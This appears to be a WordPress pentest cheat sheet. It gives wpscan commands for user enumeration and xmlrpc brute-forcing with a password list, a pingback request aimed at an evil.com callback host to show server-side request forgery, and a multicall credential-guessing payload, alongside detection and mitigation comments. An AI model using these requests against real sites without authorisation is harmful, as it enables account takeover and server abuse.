WordPress
WordPress
Check for outdated plugins:
# `p` enumerates wpscan's popular-plugins list only, not every installed plugin,
# so a clean result here is not a full plugin inventory (`ap` covers all plugins).
wpscan --url https://test.example.com/ --enumerate p
Enumerate Users:
# `u` probes a range of user IDs. Any username returned is discoverable by an
# unauthenticated visitor; restricting author archives and the REST users
# endpoint reduces what login guessing can start from.
wpscan --url https://test.example.com/ --enumerate u
Bruteforce Login:
# `root,admin` are sample usernames and the --passwords path is local to the
# author's machine. Guesses are batched through system.multicall on xmlrpc.php,
# so the access log shows a few large POSTs to xmlrpc.php rather than many
# wp-login.php hits; detection rules should cover both.
wpscan --url https://test.example.com/ --password-attack xmlrpc-multicall --usernames root,admin --passwords /opt/Hacking/Enumeration/SecurityLists/Passwords/darkweb2017-top1000.txt
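XML-RPC
List Methods (the reply names every XML-RPC method the site exposes; if `pingback.ping` or `system.multicall` appear and are not needed, remove them with the `xmlrpc_methods` filter or block `/xmlrpc.php` at the web server or WAF. In the request listings on this page the blank line that separates the HTTP headers from the XML body is not shown):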
POST /xmlrpc.php/ HTTP/1.1
Host: test.example.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-SG,en-US;q=0.9,en;q=0.8
Connection: close
Content-Length: 135
<?xml version="1.0" encoding="utf-8"?>
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>
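Pingback (`pingback.ping` makes the WordPress server fetch the first URL, so a callback received at that host shows the site can be driven to make outbound requests, which is a server-side request forgery and traffic-reflection risk. Mitigate by disabling pingbacks or removing the method, and restrict the web server's outbound traffic where possible):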
POST /xmlrpc.php/ HTTP/1.1
Host: test.example.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-SG,en-US;q=0.9,en;q=0.8
Connection: close
Content-Length: 389
<?xml version="1.0" encoding="utf-8"?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param>
<value><string>http://93aw1xaucrnalf94ml7snfytnktahz.burp.evil.com/testpush</string>
</value>
</param>
<param>
<value><string>https://test.example.com/atotech-to-present-at-the-smta-international-2020-electronics/</string>
</value>
</param></params>
</methodCall>
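Multi Login (`system.multicall` carries several `wp.getUsersBlogs` credential checks in one HTTP request, so rate limits and alerts that count requests see a single hit; detection should count the method calls inside the body. Newer WordPress releases fail the remaining logins in a batch once one authentication attempt has failed):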
POST /xmlrpc.php/ HTTP/1.1
Host: test.example.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-SG,en-US;q=0.9,en;q=0.8
Connection: close
Content-Length: 1443
<?xml version="1.0"?>
<methodCall><methodName>system.multicall</methodName><params><param><value><array><data>
<value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><data><value><array><data><value><string>root</string></value><value><string>root</string></value></data></array></value></data></array></value></member></struct></value>
<value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><data><value><array><data><value><string>root</string></value><value><string>test</string></value></data></array></value></data></array></value></member></struct></value>
<value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><data><value><array><data><value><string>admin</string></value><value><string>admin</string></value></data></array></value></data></array></value></member></struct></value>
<value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><data><value><array><data><value><string>admin</string></value><value><string>root</string></value></data></array></value></data></array></value></member></struct></value>
</data></array></value></param></params></methodCall>